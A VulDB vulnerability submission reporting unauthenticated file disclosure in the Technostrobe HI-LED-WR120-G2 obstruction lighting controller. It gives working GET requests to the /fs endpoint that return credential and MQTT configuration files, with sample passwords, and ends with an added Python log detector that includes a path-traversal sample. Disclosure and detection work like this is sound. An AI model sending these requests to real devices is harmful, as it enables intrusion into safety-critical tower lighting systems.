Submit #783324: Technostrobe HI-LED-WR120-G2 Obstruction Lighting Controller 5.5.0.1R6.03.30 Information Disclosure

Title: Technostrobe HI-LED-WR120-G2 Obstruction Lighting Controller 5.5.0.1R6.03.30 Information Disclosure
Description: Sensitive files are accessible without authentication via direct HTTP requests.

Example Request:

    GET /config/system.cfg HTTP/1.1
    Host: <target>

Example Response:

    username=admin
    password=admin123

Bug 2.0.1 — Credential File Exposed (/login.cfg)

The Request

    GET http://technostrobe.shiky.demo:58746/fs?file=%2Flogin.cfg

URL-decoded:

    GET /fs?file=/login.cfg

    ┌─────────────┐                          ┌──────────────────┐
    │             │  GET /fs?file=/          │                  │
    │  Attacker   │  login.cfg ──────────▶   │   /fs endpoint   │
    │ (no creds)  │                          │ (no auth check)  │
    │             │◀──── file contents ───   │                  │
    └─────────────┘                          └──────────────────┘

What the Response Looks Like

The login.cfg file contains user accounts and their passwords. The passwords are stored in Base64 encoding.

    # login.cfg — served freely to anyone who asks
    userId=0001
    password=MDAwMTAxNGE0NQ==   ← base64
    role=admin

Bug 2.1.1 — MQTT Broker Configuration Exposed

The Request

    GET http://technostrobe.shiky.demo:58746/fs?file=%2Fconfig%2FMQTTBroker.cfg

URL-decoded:

    GET /fs?file=/config/MQTTBroker.cfg

What Is MQTT?

    ┌─────────────────────────────────────────────────────────────────┐
    │                      MQTT IN TOWER LIGHTING                     │
    │                                                                 │
    │  Tower Light ──[MQTT publish]──▶ Broker ──[subscribe]──▶ NOC    │
    │                                                                 │
    │  Topics might include:                                          │
    │    • tower/lights/status     (light on/off/fault)               │
    │    • tower/psu/voltage       (power supply health)              │
    │    • tower/alarms/active     (fault alerts)                     │
    │    • tower/control/command   (⚠️ incoming commands)             │
    └─────────────────────────────────────────────────────────────────┘

What the Config File Contains

    # /config/MQTTBroker.cfg — served freely to anyone who asks
    [broker]
    host = mqtt.operations.example.com
    port = 1883
    clientId = technostrobe-07223277T4O5BH

    [auth]
    username = tower_device_01
    password = Twr0$ec2018!

    [topics]
    publish = tower/hiled/status
    subscribe= tower/hiled/control

Root Cause: The web server exposes internal files without enforcing authentication or access restrictions.

Impact:
- Disclosure of credentials
- Exposure of configuration data
- Enables further attacks such as authentication bypass
Source: https://github.com/shiky8/my--cve-vulnerability-research/blob/main/my_VulnDB_cves/CVE-TECHNOSTROBE-03-InfoDisclosure.md
User: shiky8 (UID 96565)
Submission: 20/03/2026 01h19 (22 days ago)
Moderation: 04/04/2026 16h41 (16 days later)
Status: Accepted
VulDB Entry: 355341 [Technostrobe HI-LED-WR120-G2 5.5.0.1R6.03.30 Configuration Data /fs File Information Disclosure]
Points: 20
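The exposure above is visible in the controller's front-end web server access log: a GET to /fs with a file parameter naming login.cfg, MQTTBroker.cfg or system.cfg that is answered with 200. The following detector is an added example, not part of the submission or of any Technostrobe software; the log lines, IP addresses and the Common Log Format layout are constructed for illustration, and the path normalisation is an assumption that the device resolves ".." segments in the file parameter.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Common Log Format). IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Mar/2026:01:19:03 +0000] "GET /fs?file=%2Flogin.cfg HTTP/1.1" 200 118 "-" "curl/8.5.0"
203.0.113.7 - - [20/Mar/2026:01:19:05 +0000] "GET /fs?file=%2Fconfig%2FMQTTBroker.cfg HTTP/1.1" 200 264 "-" "curl/8.5.0"
198.51.100.2 - - [20/Mar/2026:01:20:11 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [20/Mar/2026:01:21:40 +0000] "GET /fs?file=%2Fconfig%2Fsystem.cfg HTTP/1.1" 401 0 "-" "python-requests/2.31"
198.51.100.9 - - [20/Mar/2026:01:22:02 +0000] "GET /fs?file=%2Fconfig%2F..%2Flogin.cfg HTTP/1.1" 200 118 "-" "python-requests/2.31"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Files the submission shows being served without authentication.
SENSITIVE_FILES = {"/login.cfg", "/config/MQTTBroker.cfg", "/config/system.cfg"}


def classify_request(line):
    """Return (ip, status, normalised_file) for a /fs file-fetch request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path != "/fs":
        return None
    files = parse_qs(url.query).get("file")  # parse_qs already percent-decodes
    if not files:
        return None
    # Assumed: the device resolves ".." so /config/../login.cfg reads /login.cfg.
    normalised = posixpath.normpath("/" + files[0].lstrip("/"))
    return m.group("ip"), int(m.group("status")), normalised


def find_exposures(log_text):
    """Flag /fs fetches of sensitive files that the server answered with 200.

    A 200 means the file actually left the device; a 401/403/404 is a probe
    worth noting but not a disclosure, so it is not returned here."""
    hits = []
    for line in log_text.splitlines():
        parsed = classify_request(line)
        if parsed is None:
            continue
        ip, status, path = parsed
        if path in SENSITIVE_FILES and status == 200:
            hits.append({"ip": ip, "file": path})
    return hits


if __name__ == "__main__":
    for hit in find_exposures(SAMPLE_LOG):
        print(f"disclosure: {hit['file']} fetched by {hit['ip']}")
```

Run against the real access log, any hit is a signal to treat the credentials in that file as compromised and rotate them, not only to patch the endpoint.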
